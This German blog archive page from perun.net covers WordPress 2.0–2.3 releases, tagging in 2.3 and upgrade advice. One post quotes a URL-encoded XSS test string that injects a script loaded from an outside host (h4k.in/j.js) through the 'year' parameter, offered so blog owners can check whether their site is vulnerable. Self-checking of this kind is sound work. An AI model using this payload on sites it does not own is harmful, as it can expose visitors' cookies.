WordPress & Webwork - perun.net

In der Version 2.2.1 sind 43 Änderungen bzw.Verbesserungen (Tickets) eingeflossen. Es handelt sich nicht nur um Fehlerbereinigungen es wurden auch Sicherheitslücken geschlossen.

Via WordPress-Blog.

Ich habe heute einen Blick in WordPress 2.3 geworfen. Noch ist der Entwicklungsstand in einer frühen Phase (alpha) und die Version soll erst im September veröffentlicht werden, aber man kann schon einiges sehen was uns in der nächsten Version erwarten wird. Endlich gehört das Taggen bzw. das Verschlagworten von Beiträgen zum Funktionsumfang von WordPress. Vorbei sind die Zeiten wo man sich den Kopf zermartert hat welches Plugin man einsetzen soll. Hier eine Abbildung:

Taggen in WP 2.3

Unter der Textbox in der man Beiträge schreibt ist ein zusätzliches Textfeld dazugekommen. In gewohnter Weise trägt man hier die Schlagwörter ein. Sowohl das Default- (Kubrick), wie das Klassik-Theme sind für den Einsatz der "neuen" Tags gerüstet. Sobald man für einen Beitrag die Tags eingibt werden die auch angezeigt. Das zuständige Template-Tag für die Ausgabe von Beitrags-Tags ist:

<?php the_tags(); ?>

Zusätzlich hat man noch die Möglichkeit, das Aussehen der Tag-Links bzw. der Tag-Adresse im Bereich Einstellungen » Permalinks zu beeinflussen. Siehe Abbildung:

Somit ist es möglich von der Standardadresse (www.blog-name/tag/schlagwort-name/) abzuweichen und eine alternative Adressform zu wählen, z.B. www.blog-name/blabla/schlagwort-name/.

Was ich dann noch in den nächsten Tagen testen werde, ist die Sache wie die Übernahme der Tags, die durch das Jeromes Keywords-Plugin erstellt wurden, von statten geht.

Ich habe mich in den letzten Tagen umgeschaut und ich wollte hier eine kleinen Warnhinweis an Leute geben, die vor haben auf WordPress 2.2 upzudaten, es sind mir einige Problemfälle aufgefallen. Ich kann jetzt nicht sagen ob es mehr ist als bei anderen Versionssprüngen, da ich das nicht nachzählen kann und ich will hier natürlich auch keine Panik verbreiten. Auf jeden Fall werden im Bugsystem bis jetzt 21 25 Fehler aufgelistet.

Um die klassischen Fehlerquellen beim Upgrade auszuschließen, empfiehlt es sich alle Plugins zu deaktivieren und zum einen der Standard-Themes zu wechseln. Der Wechsel des Themes ist ratsam, falls man Plugins in das Theme ohne Abfrage eingebaut hat.

Anschließend sollte man alle WordPress-Dateien, mit Ausnahme von wp-config.php, .htaccess, dem eigenen Theme, den Uploads und der evtl. vorhandenen deutschen Sprachdatei löschen. Das man vorher ein Backup der ganzen Geschichte macht muss hier jetzt nicht extra erwähnen. Danach lädt man die Dateien der neuen Version hoch und ruft die /wp-admin/upgrade.php im Browser auf.

Daraufhin aktiviert man die Plugins nach und nach und testet ob es irgendwelche Probleme gibt. Wenn ja, entweder nach einer aktualisierten Fassung suchen oder logischerweise auf das Plugin verzichten. Das gleiche gilt für die eingesetzten Themes.

Ich persönlich würde noch empfehlen vorher nach der Plugin-Kompatibilität zu schauen und einen Testupgrade auf einer Subdomain mit identischen Serverbedingungen zu machen. Ich werde demnächst auch erstmal einen Test machen und wenn alles gut läuft dieses Blog dann auf die bald erscheinende Version 2.2.1 machen.

Einen sehr ernsten Fehler beim Upgrade von 2.1.3 auf 2.2 hat mir ein Kunde geschildert. Und zwar wird der Editor gar nicht angezeigt (weder Quicktags noch der visuelle Editor) und alle leeren Formularfelder im gesamten Adminmenü werden mit dem Wort "Array" belegt. Im Support-Forum konnte ich feststellen, das einige Leute davon betroffen sind und das solche Probleme auch z.T. bei Drupal und Geeklog auftauchen. Anscheinend hat das Problem irgendetwas mit der PHP-Version 4.3.x zu tun und ein Wechsel z.B. auf die Version 5.x behebt das Problem.

Wer aber mit der Version 2.0.10 weiterhin zufrieden ist, für den besteht kein Zwang zum Wechsel. Der Versionsstrang 2.0.x wird wie bereits angekündigt noch einige weitere Jahre mit Updates (Sicherheit und Fehlerbereinigung) gepflegt.

Nachtrag: ich habe so eben auf einer Subdomain einen Upgrade auf 2.2 simuliert und alles ist in Ordnung, sogar das Theme hier ist mit WP 2.2 kompatibel. So wie es ausschaut ist die PHP-Version 4.4.x nicht von dem o.g. Fehler betroffen.

Es gibt wieder eine neue WordPress-Version. Die Version 2.2 bringt 244 Neuerungen bzw. Änderungen mit sich. Unter anderem wurde der Blogger-Importer verbessert, die Widgets gehören zum Standard-Umfang, volle Unterstützung für Atom und die Geschwindigkeit wurde erhöht.

Via WordPress-Blog.

Nachtrag: so wie der Versionsstrang 2.1.x benötigt der neue Strang 2.2.x als Datenbank mind. die Version 4.0. Das ist beruhigend, da ursprünglich geplant war für die Version 2.2 als Minimum die MySQL-Version 4.1 zu verlangen. Das wäre für sehr viele Leute problematisch, da im Gegensatz zu dem Versionsstrang 2.0.x der Versionsstrang 2.1.x keinen Langzeit-Support genießt und somit würden die Leute die nur MySQL 4.0 zur Verfügung haben in einer Sackgasse sitzen, das ist glücklicherweise nicht der Fall. Für die Versionen 2.0.x reicht MySQL 3.23.23.

Die neuen Versionen von WordPress (2.0.10. und 2.1.3) stopfen auch ein paar Sicherheitslücken. Jens hat mich vor ein paar Tagen auf eine Demo aufmerksam gemacht in dem man herausfinden kann ob ein Weblog bedroht ist oder nicht. Einfach an die Domain seines Weblogs folgendes in der Adressleiste dranhängen:

index.php?year=%22%3E%3C/title%3E%3Cscript%20src=

http://h4k.in/j.js%3E%3C/script%3E

und aufrufen. Da die Zeile zu lang ist musste ich sie umbrechen, eigentlich muss alles in eine Zeile. Wenn du dann anstatt deiner Website irgendetwas mit XSS und jede Menge komischer Daten siehst, dann hat dein Weblog eine Lücke. Bei den ausgelesenen Daten handelt sich meiner Meinung nach um die Daten aus dem Cookie.

Wie gesagt, die neuen Versionen stopfen die Lücke und schon seit einiger Zeit konnte man sich die gepatchten Dateien auch einzeln herunterladen. Mich hat es aber gewundert warum bei mir trotz des Patches die Lücke noch vorhanden war. Da die Lücke auf den title-Tag abzielt habe ich daher als erstes das Plugin "Optimal Title" deaktiviert und diese Lücke war nicht mehr vorhanden.

In wie fern es sich hier um eine kritische Sicherheitslücke handelt, dass kann ich nicht sagen. Wer aber auch ohne das o.g. Plugin die Seitentitel so ausgeben möchte das zuerst der Beitragstitel und dann der Name der Website auftaucht – gut für Lesezeichenverwaltung und für die Suchmaschinen – der schaue sich bitte den Beitrag Optimaler Seitentitel in WordPress und die Kommentare an.

Die Updates für die Versionstränge 2.0.x und 2.1.x sind erschienen und es werden ein paar Sicherheitslücken geschlossen und Fehler korrigiert. Die Versionen bekommt man im Archiv.

Da es sich hierbei um einen kleinen Versionssprung handelt, sollte es ausreichen wenn man das neue Paket über die alten Datein überspielt. Es kommen keine neuen Funktionen und an der Datenbank wurde nichts geändert.

Nachtrag: ich habe jetzt mehrere Weblogs von 2.0.9 auf 2.0.10 und von 2.1.2 auf 2.1.3 upgedatet und es reicht einfach aus, wenn man das Paket entpackt und hochlädt bzw. die alten Dateien überspielt.

Es ist so eben ein Update von WordPress und zwar für den Versionsstrang 2.1.x erschienen. Die Version 2.1.2 fixt u.a. auch eine kritische Sicherheitslücke die in der Version 2.1.1 aufgetaucht ist. Der Versionsstrang 2.0.x bzw. die aktuellste Version dieses Strangs 2.0.9 ist davon nicht betroffen.

Für Leute, die evtl. einen Update von WordPress 2.0.x auf 2.1.x planen sollten lieber den the Month of PHP Bugs abwarten. Weil so weit ich informiert bin, ist die besagte Sicherheitslücke im Rahmen von MoPB "entdeckt" worden.

Via: WordPress.org